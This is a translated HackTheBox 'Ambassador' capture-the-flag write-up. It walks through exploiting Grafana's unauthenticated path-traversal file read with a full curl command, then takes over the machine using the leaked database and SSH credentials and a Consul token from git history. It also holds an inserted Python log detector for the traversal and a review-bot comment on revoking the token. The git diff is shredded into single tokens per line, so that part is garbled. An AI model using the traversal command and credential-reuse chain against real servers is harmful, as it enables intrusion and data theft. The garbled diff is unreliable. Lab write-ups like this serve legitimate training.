[Original] HTB Ambassador (MEDIUM)
Posted: 2022-12-19 16:54 1043
Reference link:
https://www.youtube.com/watch?v=QSITYrzRd0U
Visiting the site shows an article like this.
Visiting port 3000 shows that Grafana is in use.
Grafana has an unauthenticated arbitrary file read vulnerability:
https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/
Without using msf:
This yields the database password dontStandSoCloseToMe63221!
Obtained
Use the developer password to connect over ssh:
ssh developer@10.10.11.183
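Take a look at the /opt/ directory.
An expert says: ops staff generally like to drop projects, source code, configuration files and the like here.
There are consul and my-app directories; look in my-app first.
There is a .git directory; take a look.
A token turns up: bb03b43b-1d81-d62b-24b5-39540ee469b5
Consul's default access port is 8500; set up port forwarding.
Once it goes through, run sessions.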
rustscan 10.10.11.183
searchsploit grafana
curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
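The request above leaves a recognisable trace: a /public/plugins/<id>/ path that resolves outside the plugin's own directory. A log check for that shape, as an added example that is not part of the original post; it assumes a reverse proxy in front of Grafana writing common-log-format lines, and the log lines and client addresses are constructed samples.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

PLUGIN_PREFIX = "/public/plugins/"
# Constructed sample lines in common log format (assumed proxy log, not from the target host).
SAMPLE_LOG = """\
10.10.14.7 - - [19/Dec/2022:02:10:01 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 663552
10.10.14.7 - - [19/Dec/2022:02:10:05 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 9120
192.0.2.15 - - [19/Dec/2022:02:11:40 +0000] "GET /public/plugins/alertlist/img/icn-alert.svg HTTP/1.1" 200 1412
192.0.2.15 - - [19/Dec/2022:02:11:42 +0000] "GET /public/build/../img/grafana_icon.svg HTTP/1.1" 200 2210
"""
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def escapes_plugin_dir(raw_target: str) -> bool:
    """True if a /public/plugins/<id>/ request resolves outside that plugin's directory."""
    # Decode one layer of percent-encoding so %2e%2e is treated like "..".
    path = unquote(urlsplit(raw_target).path)
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, _, rest = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id or plugin_id in (".", ".."):
        return True
    base = PLUGIN_PREFIX + plugin_id
    # Collapse "." and ".." segments the way the file system would resolve them.
    resolved = posixpath.normpath(base + "/" + rest)
    return not (resolved == base or resolved.startswith(base + "/"))


def find_traversal(log_text: str):
    """Return (client, target, status) for every request that escapes the plugin directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and escapes_plugin_dir(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


if __name__ == "__main__":
    for client, target, status in find_traversal(SAMPLE_LOG):
        # A 200 status means the file was served, so its contents count as exposed.
        print(f"{client} {status} {target}")
```

A hit with status 200 on grafana.db or grafana.ini means the data source and admin credentials stored there need rotating, in addition to upgrading Grafana.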
sudo cp /root/.msf4/loot/20221219021334_default_10.10.11.183_grafana.loot_481578.db .
mysql -u grafana -pdontStandSoCloseToMe63221! -h 10.10.11.183
show databases;
use whackywidget;
show tables;
select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
echo 'YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==' | base64 -d
anEnglishManInNewYork027468
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script
diff
-
-
git a
/
whackywidget
/
put
-
config
-
in
-
consul.sh b
/
whackywidget
/
put
-
config
-
in
-
consul.sh
index
35c08f6
..fc51ec0
100755
-
-
-
a
/
whackywidget
/
put
-
config
-
in
-
consul.sh
+
+
+
b
/
whackywidget
/
put
-
config
-
in
-
consul.sh
@@
-
1
,
4
+
1
,
4
@@
# We use Consul for application config in production, this script will help set the correct values for the app
-
# Export MYSQL_PASSWORD before running
+
# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
-
consul kv put
-
-
token bb03b43b
-
1d81
-
d62b
-
24b5
-
39540ee469b5
whackywidget
/
db
/
mysql_pw $MYSQL_PASSWORD
+
consul kv put whackywidget
/
db
/
mysql_pw $MYSQL_PASSWORD
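Review bot: the removed `consul kv put --token ...` line keeps the literal token readable in this repository's history, so deleting it from the script does not retire it; the token should be revoked in Consul and a new one issued together with this commit, and the old value purged from history if the repository is shared. The updated header comment also asks for MYSQL_PASSWORD and CONSUL_HTTP_TOKEN to be exported, but nothing in the visible four lines checks either variable, so a guard such as `: "${CONSUL_HTTP_TOKEN:?}"` ahead of the `consul kv put` line would make the script fail early instead of running with an unset value.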
Last edited by hml189 on 2022-12-29 14:27